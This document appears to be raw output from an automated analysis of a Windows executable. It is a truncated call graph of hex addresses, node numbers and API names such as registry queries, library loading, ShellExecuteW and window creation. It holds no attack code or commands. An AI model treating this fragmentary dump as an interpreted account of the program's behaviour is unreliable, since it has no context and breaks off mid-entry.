e2e960 99040->99053 99043 e2f47a 99043->99036 99044 e74584 99044->99044 99046 e8c824 99045->99046 99047 e8c83f 99045->99047 99046->99026 99048 e8c86d 99047->99048 99049 e8c85b Sleep 99047->99049 99048->99026 99049->99048 99051->99026 99052->99036 99054 e30340 207 API calls 99053->99054 99055 e2e99d 99054->99055 99056 e2ea0b ISource 99055->99056 99057 e731d3 99055->99057 99059 e2edd5 99055->99059 99060 e2eac3 99055->99060 99065 e2ebb8 99055->99065 99074 e4014b 8 API calls 99055->99074 99080 e2eb29 ISource __fread_nolock 99055->99080 99056->99043 99099 e93fe1 81 API calls __wsopen_s 99057->99099 99059->99056 99069 e4017b 8 API calls 99059->99069 99060->99059 99062 e2eace 99060->99062 99061 e2ecff 99063 e731c4 99061->99063 99064 e2ed14 99061->99064 99066 e4014b 8 API calls 99062->99066 99098 ea6162 8 API calls 99063->99098 99068 e4014b 8 API calls 99064->99068 99070 e4017b 8 API calls 99065->99070 99073 e2ead5 __fread_nolock 99066->99073 99077 e2eb6a 99068->99077 99069->99073 99070->99080 99071 e4014b 8 API calls 99072 e2eaf6 99071->99072 99072->99080 99086 e2d260 99072->99086 99073->99071 99073->99072 99074->99055 99076 e731b3 99097 e93fe1 81 API calls __wsopen_s 99076->99097 99077->99043 99080->99061 99080->99076 99080->99077 99081 e7318e 99080->99081 99083 e7316c 99080->99083 99094 e244fe 207 API calls 99080->99094 99096 e93fe1 81 API calls __wsopen_s 99081->99096 99095 e93fe1 81 API calls __wsopen_s 99083->99095 99085->99044 99087 e2d2c6 99086->99087 99088 e2d29a 99086->99088 99090 e30340 207 API calls 99087->99090 99092 e2d2a0 99088->99092 99100 e2f6d0 99088->99100 99091 e7184b 99090->99091 99091->99092 99123 e93fe1 81 API calls __wsopen_s 99091->99123 99092->99080 99094->99080 99095->99077 99096->99077 99097->99077 99098->99057 99099->99056 99101 e2f710 99100->99101 99118 e2f7dc ISource 99101->99118 99125 e405b2 5 API calls __Init_thread_wait 99101->99125 99104 e745d9 99106 e2bf73 8 API calls 99104->99106 99104->99118 99105 e2bf73 8 API calls 99105->99118 99107 e745f3 99106->99107 99126 e40413 29 API calls __onexit 99107->99126 99108 e2be2d 39 API calls 99108->99118 99111 e745fd 99127 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99111->99127 99115 e30340 207 API calls 99115->99118 99116 e2bed9 8 API calls 99116->99118 99117 e31ca0 8 API calls 99117->99118 99118->99105 99118->99108 99118->99115 99118->99116 99118->99117 99119 e93fe1 81 API calls 99118->99119 99120 e2fae1 99118->99120 99124 e3b35c 207 API calls 99118->99124 99128 e405b2 5 API calls __Init_thread_wait 99118->99128 99129 e40413 29 API calls __onexit 99118->99129 99130 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99118->99130 99131 ea5231 101 API calls 99118->99131 99132 ea731e 207 API calls 99118->99132 99119->99118 99120->99092 99123->99092 99124->99118 99125->99104 99126->99111 99127->99118 99128->99118 99129->99118 99130->99118 99131->99118 99132->99118 97418 e4076b 97419 e40777 ___DestructExceptionObject 97418->97419 97448 e40221 97419->97448 97421 e4077e 97422 e408d1 97421->97422 97425 e407a8 97421->97425 97486 e40baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97422->97486 97424 e408d8 97487 e451c2 28 API calls _abort 97424->97487 97436 e407e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97425->97436 97459 e527ed 97425->97459 97427 e408de 97488 e45174 28 API calls _abort 97427->97488 97431 e408e6 97432 e407c7 97434 e40848 97467 e40cc9 97434->97467 97436->97434 97482 e4518a 38 API calls 3 library calls 97436->97482 97437 e4084e 97471 e2331b 97437->97471 97442 e4086a 97442->97424 97443 e4086e 97442->97443 97444 e40877 97443->97444 97484 e45165 28 API calls _abort 97443->97484 97485 e403b0 13 API calls 2 library calls 97444->97485 97447 e4087f 97447->97432 97449 e4022a 97448->97449 97489 e40a08 IsProcessorFeaturePresent 97449->97489 97451 e40236 97490 e43004 10 API calls 3 library calls 97451->97490 97453 e4023b 97454 e4023f 97453->97454 97491 e52687 97453->97491 97454->97421 97457 e40256 97457->97421 97460 e52804 97459->97460 97461 e40dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97460->97461 97462 e407c1 97461->97462 97462->97432 97463 e52791 97462->97463 97464 e527c0 97463->97464 97465 e40dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97464->97465 97466 e527e9 97465->97466 97466->97436 97566 e426b0 97467->97566 97470 e40cef 97470->97437 97472 e23382 97471->97472 97473 e23327 IsThemeActive 97471->97473 97483 e40d02 GetModuleHandleW 97472->97483 97568 e452b3 97473->97568 97475 e23352 97574 e45319 97475->97574 97477 e23359 97581 e232e6 SystemParametersInfoW SystemParametersInfoW 97477->97581 97479 e23360 97582 e2338b 97479->97582 97481 e23368 SystemParametersInfoW 97481->97472 97482->97434 97483->97442 97484->97444 97485->97447 97486->97424 97487->97427 97488->97431 97489->97451 97490->97453 97495 e5d576 97491->97495 97494 e4302d 8 API calls 3 library calls 97494->97454 97496 e5d593 97495->97496 97499 e5d58f 97495->97499 97496->97499 97501 e54f6e 97496->97501 97498 e40248 97498->97457 97498->97494 97513 e40dfc 97499->97513 97502 e54f7a ___DestructExceptionObject 97501->97502 97520 e532d1 EnterCriticalSection 97502->97520 97504 e54f81 97521 e55422 97504->97521 97506 e54f90 97512 e54f9f 97506->97512 97534 e54e02 29 API calls 97506->97534 97509 e54fb0 __wsopen_s 97509->97496 97510 e54f9a 97535 e54eb8 GetStdHandle GetFileType 97510->97535 97536 e54fbb LeaveCriticalSection _abort 97512->97536 97514 e40e05 97513->97514 97515 e40e07 IsProcessorFeaturePresent 97513->97515 97514->97498 97517 e40fce 97515->97517 97565 e40f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97517->97565 97519 e410b1 97519->97498 97520->97504 97522 e5542e ___DestructExceptionObject 97521->97522 97523 e55452 97522->97523 97524 e5543b 97522->97524 97537 e532d1 EnterCriticalSection 97523->97537 97545 e4f649 20 API calls _free 97524->97545 97527 e55440 97546 e52b5c 26 API calls _abort 97527->97546 97529 e5544a __wsopen_s 97529->97506 97530 e5548a 97547 e554b1 LeaveCriticalSection _abort 97530->97547 97533 e5545e 97533->97530 97538 e55373 97533->97538 97534->97510 97535->97512 97536->97509 97537->97533 97548 e54ff0 97538->97548 97540 e55385 97544 e55392 97540->97544 97555 e53778 11 API calls 2 library calls 97540->97555 97543 e553e4 97543->97533 97556 e52d38 97544->97556 97545->97527 97546->97529 97547->97529 97554 e54ffd __FrameHandler3::FrameUnwindToState 97548->97554 97549 e5503d 97563 e4f649 20 API calls _free 97549->97563 97550 e55028 RtlAllocateHeap 97552 e5503b 97550->97552 97550->97554 97552->97540 97554->97549 97554->97550 97562 e4521d 7 API calls 2 library calls 97554->97562 97555->97540 97557 e52d43 RtlFreeHeap 97556->97557 97561 e52d6c _free 97556->97561 97558 e52d58 97557->97558 97557->97561 97564 e4f649 20 API calls _free 97558->97564 97560 e52d5e GetLastError 97560->97561 97561->97543 97562->97554 97563->97552 97564->97560 97565->97519 97567 e40cdc GetStartupInfoW 97566->97567 97567->97470 97569 e452bf ___DestructExceptionObject 97568->97569 97631 e532d1 EnterCriticalSection 97569->97631 97571 e452ca pre_c_initialization 97632 e4530a 97571->97632 97573 e452ff __wsopen_s 97573->97475 97575 e45325 97574->97575 97576 e4533f 97574->97576 97575->97576 97636 e4f649 20 API calls _free 97575->97636 97576->97477 97578 e4532f 97637 e52b5c 26 API calls _abort 97578->97637 97580 e4533a 97580->97477 97581->97479 97583 e2339b __wsopen_s 97582->97583 97584 e2bf73 8 API calls 97583->97584 97585 e233a7 GetCurrentDirectoryW 97584->97585 97638 e24fd9 97585->97638 97587 e233ce IsDebuggerPresent 97588 e63ca3 MessageBoxA 97587->97588 97589 e233dc 97587->97589 97591 e63cbb 97588->97591 97590 e233f0 97589->97590 97589->97591 97706 e23a95 97590->97706 97742 e24176 8 API calls 97591->97742 97599 e23462 97600 e63cec SetCurrentDirectoryW 97599->97600 97601 e2346a 97599->97601 97600->97601 97602 e23475 97601->97602 97743 e81fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 97601->97743 97738 e234d3 7 API calls 97602->97738 97605 e63d07 97605->97602 97608 e63d19 97605->97608 97744 e25594 97608->97744 97609 e2347f 97612 e2396b 60 API calls 97609->97612 97613 e23494 97609->97613 97611 e63d22 97614 e2b329 8 API calls 97611->97614 97612->97613 97616 e234af 97613->97616 97617 e23907 Shell_NotifyIconW 97613->97617 97615 e63d30 97614->97615 97618 e63d5f 97615->97618 97619 e63d38 97615->97619 97620 e234b6 SetCurrentDirectoryW 97616->97620 97617->97616 97621 e26b7c 8 API calls 97618->97621 97622 e26b7c 8 API calls 97619->97622 97623 e234ca 97620->97623 97624 e63d5b GetForegroundWindow ShellExecuteW 97621->97624 97625 e63d43 97622->97625 97623->97481 97628 e63d90 97624->97628 97627 e27bb5 8 API calls 97625->97627 97629 e63d51 97627->97629 97628->97616 97630 e26b7c 8 API calls 97629->97630 97630->97624 97631->97571 97635 e53319 LeaveCriticalSection 97632->97635 97634 e45311 97634->97573 97635->97634 97636->97578 97637->97580 97639 e2bf73 8 API calls 97638->97639 97640 e24fef 97639->97640 97751 e263d7 97640->97751 97642 e2500d 97643 e2bd57 8 API calls 97642->97643 97644 e25021 97643->97644 97645 e2bed9 8 API calls 97644->97645 97646 e2502c 97645->97646 97765 e2893c 97646->97765 97649 e2b329 8 API calls 97650 e25045 97649->97650 97651 e2be2d 39 API calls 97650->97651 97652 e25055 97651->97652 97653 e2b329 8 API calls 97652->97653 97654 e2507b 97653->97654 97655 e2be2d 39 API calls 97654->97655 97656 e2508a 97655->97656 97657 e2bf73 8 API calls 97656->97657 97658 e250a8 97657->97658 97768 e251ca 97658->97768 97661 e44d98 _strftime 40 API calls 97662 e250c2 97661->97662 97663 e64b23 97662->97663 97664 e250cc 97662->97664 97666 e251ca 8 API calls 97663->97666 97665 e44d98 _strftime 40 API calls 97664->97665 97667 e250d7 97665->97667 97668 e64b37 97666->97668 97667->97668 97669 e250e1 97667->97669 97671 e251ca 8 API calls 97668->97671 97670 e44d98 _strftime 40 API calls 97669->97670 97672 e250ec 97670->97672 97673 e64b53 97671->97673 97672->97673 97674 e250f6 97672->97674 97675 e25594 10 API calls 97673->97675 97676 e44d98 _strftime 40 API calls 97674->97676 97677 e64b76 97675->97677 97678 e25101 97676->97678 97679 e251ca 8 API calls 97677->97679 97680 e2510b 97678->97680 97696 e64b9f 97678->97696 97681 e64b82 97679->97681 97682 e2512e 97680->97682 97685 e2bed9 8 API calls 97680->97685 97684 e2bed9 8 API calls 97681->97684 97690 e27e12 8 API calls 97682->97690 97699 e64bda 97682->97699 97683 e251ca 8 API calls 97686 e64bbd 97683->97686 97687 e64b90 97684->97687 97688 e25121 97685->97688 97689 e2bed9 8 API calls 97686->97689 97692 e251ca 8 API calls 97687->97692 97693 e251ca 8 API calls 97688->97693 97694 e64bcb 97689->97694 97691 e2513e 97690->97691 97695 e28470 8 API calls 97691->97695 97692->97696 97693->97682 97697 e251ca 8 API calls 97694->97697 97698 e2514c 97695->97698 97696->97683 97697->97699 97774 e28a60 97698->97774 97701 e2893c 8 API calls 97703 e25167 97701->97703 97702 e28a60 8 API calls 97702->97703 97703->97701 97703->97702 97704 e251ab 97703->97704 97705 e251ca 8 API calls 97703->97705 97704->97587 97705->97703 97707 e23aa2 __wsopen_s 97706->97707 97708 e23abb 97707->97708 97709 e640da ___scrt_fastfail 97707->97709 97710 e25851 9 API calls 97708->97710 97712 e640f6 GetOpenFileNameW 97709->97712 97711 e23ac4 97710->97711 97792 e23a57 97711->97792 97714 e64145 97712->97714 97715 e28577 8 API calls 97714->97715 97717 e6415a 97715->97717 97717->97717 97719 e23ad9 97810 e262d5 97719->97810 98420 e23624 7 API calls 97738->98420 97740 e2347a 97741 e235b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97740->97741 97741->97609 97742->97599 97743->97605 97745 e622d0 __wsopen_s 97744->97745 97746 e255a1 GetModuleFileNameW 97745->97746 97747 e2b329 8 API calls 97746->97747 97748 e255c7 97747->97748 97749 e25851 9 API calls 97748->97749 97750 e255d1 97749->97750 97750->97611 97752 e263e4 __wsopen_s 97751->97752 97753 e28577 8 API calls 97752->97753 97754 e26416 97752->97754 97753->97754 97755 e2655e 8 API calls 97754->97755 97760 e2644c 97754->97760 97755->97754 97756 e2b329 8 API calls 97757 e26543 97756->97757 97759 e26a7c 8 API calls 97757->97759 97758 e2b329 8 API calls 97758->97760 97761 e2654f 97759->97761 97760->97758 97763 e2651a 97760->97763 97764 e2655e 8 API calls 97760->97764 97785 e26a7c 97760->97785 97761->97642 97763->97756 97763->97761 97764->97760 97766 e4014b 8 API calls 97765->97766 97767 e25038 97766->97767 97767->97649 97769 e251f2 97768->97769 97770 e251d4 97768->97770 97772 e28577 8 API calls 97769->97772 97771 e250b4 97770->97771 97773 e2bed9 8 API calls 97770->97773 97771->97661 97772->97771 97773->97771 97775 e28a76 97774->97775 97776 e66737 97775->97776 97782 e28a80 97775->97782 97791 e3b7a2 8 API calls 97776->97791 97777 e66744 97779 e2b4c8 8 API calls 97777->97779 97780 e66762 97779->97780 97780->97780 97781 e28b94 97783 e4014b 8 API calls 97781->97783 97782->97777 97782->97781 97784 e28b9b 97782->97784 97783->97784 97784->97703 97786 e26a8b 97785->97786 97790 e26aac __fread_nolock 97785->97790 97788 e4017b 8 API calls 97786->97788 97787 e4014b 8 API calls 97789 e26abf 97787->97789 97788->97790 97789->97760 97790->97787 97791->97777 97793 e622d0 __wsopen_s 97792->97793 97794 e23a64 GetLongPathNameW 97793->97794 97795 e28577 8 API calls 97794->97795 97796 e23a8c 97795->97796 97797 e253f2 97796->97797 97798 e2bf73 8 API calls 97797->97798 97799 e25404 97798->97799 97800 e25851 9 API calls 97799->97800 97801 e2540f 97800->97801 97802 e2541a 97801->97802 97805 e64d5b 97801->97805 97804 e26a7c 8 API calls 97802->97804 97806 e25426 97804->97806 97807 e64d7d 97805->97807 97846 e3e36b 41 API calls 97805->97846 97840 e21340 97806->97840 97809 e25439 97809->97719 97847 e26679 97810->97847 97813 e65336 97972 e936b8 97813->97972 97815 e26679 93 API calls 97817 e2630e 97815->97817 97817->97813 97820 e26316 97817->97820 97841 e21352 97840->97841 97845 e21371 __fread_nolock 97840->97845 97843 e4017b 8 API calls 97841->97843 97842 e4014b 8 API calls 97844 e21388 97842->97844 97843->97845 97844->97809 97845->97842 97846->97805 98026 e2663e LoadLibraryA 97847->98026 97852 e266a4 LoadLibraryExW 98034 e26607 LoadLibraryA 97852->98034 97853 e65648 97854 e266e7 68 API calls 97853->97854 97857 e6564f 97854->97857 97859 e26607 3 API calls 97857->97859 97862 e65657 97859->97862 97860 e266ce 97861 e266da 97860->97861 97860->97862 97863 e266e7 68 API calls 97861->97863 98055 e2684a 97862->98055 97865 e262fa 97863->97865 97865->97813 97865->97815 97973 e936d4 97972->97973 97974 e26874 64 API calls 97973->97974 98027 e26656 GetProcAddress 98026->98027 98028 e26674 98026->98028 98029 e26666 98027->98029 98031 e4e95b 98028->98031 98029->98028 98030 e2666d FreeLibrary 98029->98030 98030->98028 98063 e4e89a 98031->98063 98033 e26698 98033->97852 98033->97853 98035 e2663b 98034->98035 98036 e2661c GetProcAddress 98034->98036 98039 e26720 98035->98039 98037 e2662c 98036->98037 98037->98035 98038 e26634 FreeLibrary 98037->98038 98038->98035 98040 e4017b 8 API calls 98039->98040 98041 e26735 98040->98041 98042 e2423c 8 API calls 98041->98042 98044 e26741 __fread_nolock 98042->98044 98043 e656c2 98121 e93a92 74 API calls 98043->98121 98044->98043 98048 e2677c 98044->98048 98120 e93a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 98044->98120 98047 e2684a 40 API calls 98047->98048 98048->98047 98049 e26874 64 API calls 98048->98049 98051 e26810 ISource 98048->98051 98052 e65706 98048->98052 98049->98048 98051->97860 98115 e26874 98052->98115 98056 e65760 98055->98056 98057 e2685c 98055->98057 98153 e4ec34 98057->98153 98060 e932bd 98255 e9310d 98060->98255 98066 e4e8a6 ___DestructExceptionObject 98063->98066 98064 e4e8b4 98088 e4f649 20 API calls _free 98064->98088 98066->98064 98068 e4e8e4 98066->98068 98067 e4e8b9 98089 e52b5c 26 API calls _abort 98067->98089 98070 e4e8f6 98068->98070 98071 e4e8e9 98068->98071 98080 e583e1 98070->98080 98090 e4f649 20 API calls _free 98071->98090 98074 e4e8ff 98075 e4e905 98074->98075 98076 e4e912 98074->98076 98091 e4f649 20 API calls _free 98075->98091 98092 e4e944 LeaveCriticalSection __fread_nolock 98076->98092 98078 e4e8c4 __wsopen_s 98078->98033 98081 e583ed ___DestructExceptionObject 98080->98081 98093 e532d1 EnterCriticalSection 98081->98093 98083 e583fb 98094 e5847b 98083->98094 98087 e5842c __wsopen_s 98087->98074 98088->98067 98089->98078 98090->98078 98091->98078 98092->98078 98093->98083 98101 e5849e 98094->98101 98095 e584f7 98096 e54ff0 __FrameHandler3::FrameUnwindToState 20 API calls 98095->98096 98097 e58500 98096->98097 98099 e52d38 _free 20 API calls 98097->98099 98100 e58509 98099->98100 98106 e58408 98100->98106 98112 e53778 11 API calls 2 library calls 98100->98112 98101->98095 98101->98101 98101->98106 98110 e494fd EnterCriticalSection 98101->98110 98111 e49511 LeaveCriticalSection 98101->98111 98103 e58528 98113 e494fd EnterCriticalSection 98103->98113 98107 e58437 98106->98107 98114 e53319 LeaveCriticalSection 98107->98114 98109 e5843e 98109->98087 98110->98101 98111->98101 98112->98103 98113->98106 98114->98109 98116 e26883 98115->98116 98117 e65780 98115->98117 98122 e4f053 98116->98122 98120->98043 98121->98048 98125 e4ee1a 98122->98125 98128 e4ee26 ___DestructExceptionObject 98125->98128 98126 e4ee32 98150 e4f649 20 API calls _free 98126->98150 98128->98126 98129 e4ee58 98128->98129 98138 e494fd EnterCriticalSection 98129->98138 98131 e4ee37 98132 e4ee64 98138->98132 98150->98131 98156 e4ec51 98153->98156 98155 e2686d 98155->98060 98157 e4ec5d ___DestructExceptionObject 98156->98157 98158 e4ec9d 98157->98158 98159 e4ec95 __wsopen_s 98157->98159 98161 e4ec70 ___scrt_fastfail 98157->98161 98169 e494fd EnterCriticalSection 98158->98169 98159->98155 98183 e4f649 20 API calls _free 98161->98183 98163 e4eca7 98170 e4ea68 98163->98170 98164 e4ec8a 98184 e52b5c 26 API calls _abort 98164->98184 98169->98163 98172 e4ea7a ___scrt_fastfail 98170->98172 98176 e4ea97 98170->98176 98171 e4ea87 98251 e4f649 20 API calls _free 98171->98251 98172->98171 98172->98176 98178 e4eada __fread_nolock 98172->98178 98174 e4ea8c 98185 e4ecdc LeaveCriticalSection __fread_nolock 98176->98185 98177 e4ebf6 ___scrt_fastfail 98254 e4f649 20 API calls _free 98177->98254 98178->98176 98178->98177 98180 e4dcc5 __fread_nolock 26 API calls 98178->98180 98186 e590c5 98178->98186 98253 e4d2e8 26 API calls 4 library calls 98178->98253 98180->98178 98183->98164 98184->98159 98185->98159 98187 e590d7 98186->98187 98251->98174 98253->98178 98254->98174 98258 e4e858 98255->98258 98261 e4e7d9 98258->98261 98262 e4e7e8 98261->98262 98264 e4e7fc 98261->98264 98269 e4f649 20 API calls _free 98262->98269 98267 e4e7f8 __alldvrm 98264->98267 98271 e536b2 11 API calls 2 library calls 98264->98271 98271->98267 98420->97740 98421 e21033 98426 e268b4 98421->98426 98425 e21042 98427 e2bf73 8 API calls 98426->98427 98428 e26922 98427->98428 98434 e2589f 98428->98434 98431 e269bf 98432 e21038 98431->98432 98437 e26b14 8 API calls __fread_nolock 98431->98437 98433 e40413 29 API calls __onexit 98432->98433 98433->98425 98438 e258cb 98434->98438 98437->98431 98439 e258be 98438->98439 98440 e258d8 98438->98440 98439->98431 98440->98439 98441 e258df RegOpenKeyExW 98440->98441 98441->98439 98442 e258f9 RegQueryValueExW 98441->98442 98443 e2592f RegCloseKey 98442->98443 98444 e2591a 98442->98444 98443->98439 98444->98443 99133 e76555 99134 e4014b 8 API calls 99133->99134 99135 e7655c 99134->99135 99137 e4017b 8 API calls 99135->99137 99139 e76575 __fread_nolock 99135->99139 99136 e4017b 8 API calls 99138 e7659a 99136->99138 99137->99139 99139->99136 98445 e236f5 98448 e2370f 98445->98448 98449 e23726 98448->98449 98450 e2378a 98449->98450 98451 e2372b 98449->98451 98488 e23788 98449->98488 98453 e63df4 98450->98453 98454 e23790 98450->98454 98455 e23804 PostQuitMessage 98451->98455 98456 e23738 98451->98456 98452 e2376f DefWindowProcW 98490 e23709 98452->98490 98503 e22f92 10 API calls 98453->98503 98457 e23797 98454->98457 98458 e237bc SetTimer RegisterWindowMessageW 98454->98458 98455->98490 98459 e23743 98456->98459 98460 e63e61 98456->98460 98463 e237a0 KillTimer 98457->98463 98464 e63d95 98457->98464 98465 e237e5 CreatePopupMenu 98458->98465 98458->98490 98466 e2380e 98459->98466 98467 e2374d 98459->98467 98506 e8c8f7 65 API calls ___scrt_fastfail 98460->98506 98462 e63e15 98504 e3f23c 40 API calls 98462->98504 98474 e23907 Shell_NotifyIconW 98463->98474 98472 e63dd0 MoveWindow 98464->98472 98473 e63d9a 98464->98473 98465->98490 98493 e3fcad 98466->98493 98475 e23758 98467->98475 98480 e63e46 98467->98480 98469 e63e73 98469->98452 98469->98490 98472->98490 98477 e63da0 98473->98477 98478 e63dbf SetFocus 98473->98478 98479 e237b3 98474->98479 98476 e237f2 98475->98476 98482 e23763 98475->98482 98501 e2381f 75 API calls ___scrt_fastfail 98476->98501 98477->98482 98483 e63da9 98477->98483 98478->98490 98500 e259ff DeleteObject DestroyWindow 98479->98500 98480->98452 98505 e81423 8 API calls 98480->98505 98482->98452 98489 e23907 Shell_NotifyIconW 98482->98489 98502 e22f92 10 API calls 98483->98502 98486 e23802 98486->98490 98488->98452 98491 e63e3a 98489->98491 98492 e2396b 60 API calls 98491->98492 98492->98488 98494 e3fcc5 ___scrt_fastfail 98493->98494 98495 e3fd4b 98493->98495 98496 e261a9 55 API calls 98494->98496 98495->98490 98498 e3fcec 98496->98498 98497 e3fd34 KillTimer SetTimer 98497->98495 98498->98497 98499 e7fe2b Shell_NotifyIconW 98498->98499 98499->98497 98500->98490 98501->98486 98502->98490 98503->98462 98504->98482 98505->98488 98506->98469 99140 e75650 99149 e3e3d5 99140->99149 99142 e75666 99144 e756e1 99142->99144 99158 e3aa65 9 API calls 99142->99158 99146 e761d7 99144->99146 99160 e93fe1 81 API calls __wsopen_s 99144->99160 99147 e756c1 99147->99144 99159 e9247e 8 API calls 99147->99159 99150 e3e3e3 99149->99150 99151 e3e3f6 99149->99151 99152 e2b4c8 8 API calls 99150->99152 99153 e3e3fb 99151->99153 99154 e3e429 99151->99154 99157 e3e3ed 99152->99157 99155 e4014b 8 API calls 99153->99155 99156 e2b4c8 8 API calls 99154->99156 99155->99157 99156->99157 99157->99142 99158->99147 99159->99144 99160->99146 99161 e2105b 99166 e252a7 99161->99166 99163 e2106a 99197 e40413 29 API calls __onexit 99163->99197 99165 e21074 99167 e252b7 __wsopen_s 99166->99167 99168 e2bf73 8 API calls 99167->99168 99169 e2536d 99168->99169 99170 e25594 10 API calls 99169->99170 99171 e25376 99170->99171 99198 e25238 99171->99198 99174 e26b7c 8 API calls 99175 e2538f 99174->99175 99176 e26a7c 8 API calls 99175->99176 99177 e2539e 99176->99177 99178 e2bf73 8 API calls 99177->99178 99179 e253a7 99178->99179 99180 e2bd57 8 API calls 99179->99180 99181 e253b0 RegOpenKeyExW 99180->99181 99182 e64be6 RegQueryValueExW 99181->99182 99186 e253d2 99181->99186 99183 e64c03 99182->99183 99184 e64c7c RegCloseKey 99182->99184 99185 e4017b 8 API calls 99183->99185 99184->99186 99189 e64c8e _wcslen 99184->99189 99187 e64c1c 99185->99187 99186->99163 99188 e2423c 8 API calls 99187->99188 99190 e64c27 RegQueryValueExW 99188->99190 99189->99186 99191 e2655e 8 API calls 99189->99191 99195 e2b329 8 API calls 99189->99195 99196 e26a7c 8 API calls 99189->99196 99192 e64c44 99190->99192 99193 e64c5e ISource 99190->99193 99191->99189 99194 e28577 8 API calls 99192->99194 99193->99184 99194->99193 99195->99189 99196->99189 99197->99165 99199 e622d0 __wsopen_s 99198->99199 99200 e25245 GetFullPathNameW 99199->99200 99201 e25267 99200->99201 99202 e28577 8 API calls 99201->99202 99203 e25285 99202->99203 99203->99174 99204 e21098 99209 e25fc8 99204->99209 99208 e210a7 99210 e2bf73 8 API calls 99209->99210 99211 e25fdf GetVersionExW 99210->99211 99212 e28577 8 API calls 99211->99212 99213 e2602c 99212->99213 99214 e2adf4 8 API calls 99213->99214 99228 e26062 99213->99228 99215 e26056 99214->99215 99217 e255dc 8 API calls 99215->99217 99216 e2611c GetCurrentProcess IsWow64Process 99218 e26138 99216->99218 99217->99228 99219 e26150 LoadLibraryA 99218->99219 99220 e65269 GetSystemInfo 99218->99220 99221 e26161 GetProcAddress 99219->99221 99222 e2619d GetSystemInfo 99219->99222 99221->99222 99224 e26171 GetNativeSystemInfo 99221->99224 99225 e26177 99222->99225 99223 e65224 99224->99225 99226 e2109d 99225->99226 99227 e2617b FreeLibrary 99225->99227 99229 e40413 29 API calls __onexit 99226->99229 99227->99226 99228->99216 99228->99223 99229->99208 98507 e30ebf 98508 e30ed3 98507->98508 98514 e31425 98507->98514 98509 e30ee5 98508->98509 98510 e4014b 8 API calls 98508->98510 98511 e7562c 98509->98511 98512 e2b4c8 8 API calls 98509->98512 98513 e30f3e 98509->98513 98510->98509 98540 e91b14 8 API calls 98511->98540 98512->98509 98516 e32b20 207 API calls 98513->98516 98532 e3049d ISource 98513->98532 98514->98509 98517 e2bed9 8 API calls 98514->98517 98538 e30376 ISource 98516->98538 98517->98509 98518 e7632b 98544 e93fe1 81 API calls __wsopen_s 98518->98544 98519 e31e50 40 API calls 98519->98538 98520 e31695 98527 e2bed9 8 API calls 98520->98527 98520->98532 98522 e2bed9 8 API calls 98522->98538 98523 e75cdb 98529 e2bed9 8 API calls 98523->98529 98523->98532 98524 e7625a 98543 e93fe1 81 API calls __wsopen_s 98524->98543 98527->98532 98528 e31990 207 API calls 98528->98538 98529->98532 98530 e405b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98530->98538 98531 e2bf73 8 API calls 98531->98538 98533 e40413 29 API calls pre_c_initialization 98533->98538 98534 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98534->98538 98535 e76115 98541 e93fe1 81 API calls __wsopen_s 98535->98541 98537 e4014b 8 API calls 98537->98538 98538->98518 98538->98519 98538->98520 98538->98522 98538->98523 98538->98524 98538->98528 98538->98530 98538->98531 98538->98532 98538->98533 98538->98534 98538->98535 98538->98537 98539 e30aae ISource 98538->98539 98542 e93fe1 81 API calls __wsopen_s 98539->98542 98540->98532 98541->98539 98542->98532 98543->98532 98544->98532 99230 e2f4dc 99231 e2cab0 207 API calls 99230->99231 99232 e2f4ea 99231->99232 98545 e5947a 98546 e59487 98545->98546 98549 e5949f 98545->98549 98595 e4f649 20 API calls _free 98546->98595 98548 e5948c 98596 e52b5c 26 API calls _abort 98548->98596 98551 e594fa 98549->98551 98559 e59497 98549->98559 98597 e60144 21 API calls 2 library calls 98549->98597 98553 e4dcc5 __fread_nolock 26 API calls 98551->98553 98554 e59512 98553->98554 98565 e58fb2 98554->98565 98556 e59519 98557 e4dcc5 __fread_nolock 26 API calls 98556->98557 98556->98559 98558 e59545 98557->98558 98558->98559 98560 e4dcc5 __fread_nolock 26 API calls 98558->98560 98561 e59553 98560->98561 98561->98559 98562 e4dcc5 __fread_nolock 26 API calls 98561->98562 98563 e59563 98562->98563 98564 e4dcc5 __fread_nolock 26 API calls 98563->98564 98564->98559 98566 e58fbe ___DestructExceptionObject 98565->98566 98567 e58fc6 98566->98567 98568 e58fde 98566->98568 98599 e4f636 20 API calls _free 98567->98599 98570 e590a4 98568->98570 98575 e59017 98568->98575 98606 e4f636 20 API calls _free 98570->98606 98572 e58fcb 98600 e4f649 20 API calls _free 98572->98600 98573 e590a9 98607 e4f649 20 API calls _free 98573->98607 98577 e59026 98575->98577 98578 e5903b 98575->98578 98601 e4f636 20 API calls _free 98577->98601 98598 e554ba EnterCriticalSection 98578->98598 98580 e59033 98608 e52b5c 26 API calls _abort 98580->98608 98582 e5902b 98602 e4f649 20 API calls _free 98582->98602 98583 e59041 98585 e59072 98583->98585 98586 e5905d 98583->98586 98590 e590c5 __fread_nolock 38 API calls 98585->98590 98603 e4f649 20 API calls _free 98586->98603 98588 e58fd3 __wsopen_s 98588->98556 98592 e5906d 98590->98592 98591 e59062 98604 e4f636 20 API calls _free 98591->98604 98605 e5909c LeaveCriticalSection __wsopen_s 98592->98605 98595->98548 98596->98559 98597->98551 98598->98583 98599->98572 98600->98588 98601->98582 98602->98580 98603->98591 98604->98592 98605->98588 98606->98573 98607->98580 98608->98588 98609 e2dd3d 98610 e2dd63 98609->98610 98611 e719c2 98609->98611 98612 e2dead 98610->98612 98615 e4014b 8 API calls 98610->98615 98614 e71a82 98611->98614 98619 e71a26 98611->98619 98622 e71a46 98611->98622 98616 e4017b 8 API calls 98612->98616 98669 e93fe1 81 API calls __wsopen_s 98614->98669 98621 e2dd8d 98615->98621 98628 